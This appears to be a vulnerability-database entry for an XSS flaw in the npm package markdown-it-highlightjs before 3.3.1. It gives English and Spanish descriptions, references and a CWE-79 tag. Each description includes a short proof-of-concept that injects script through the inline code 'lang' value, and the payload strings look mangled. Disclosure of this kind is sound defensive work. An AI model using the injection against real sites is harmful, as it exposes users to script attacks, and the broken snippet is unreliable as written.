1 results (0.006 seconds)

CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 1

This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){.">js}'); console.log(reuslt_xss); Esto afecta al paquete markdown-it-highlightjs versiones anteriores a 3.3.1. Es posible insertar JavaScript malicioso como valor de lang en la funcionalidad de resaltado de código en línea markdown-it-highlightjs. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require("markdown-it"); const reuslt_xss = md() .use(markdownItHighlightjs, {inline: true}) .render("console.log(42){.")js}'); console.log(reuslt_xss) • https://github.com/valeriangalliat/markdown-it-highlightjs/blob/v3.3.0/index.js%23L52 https://github.com/valeriangalliat/markdown-it-highlightjs/pull/14 https://snyk.io/vuln/SNYK-JS-MARKDOWNITHIGHLIGHTJS-1040461 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •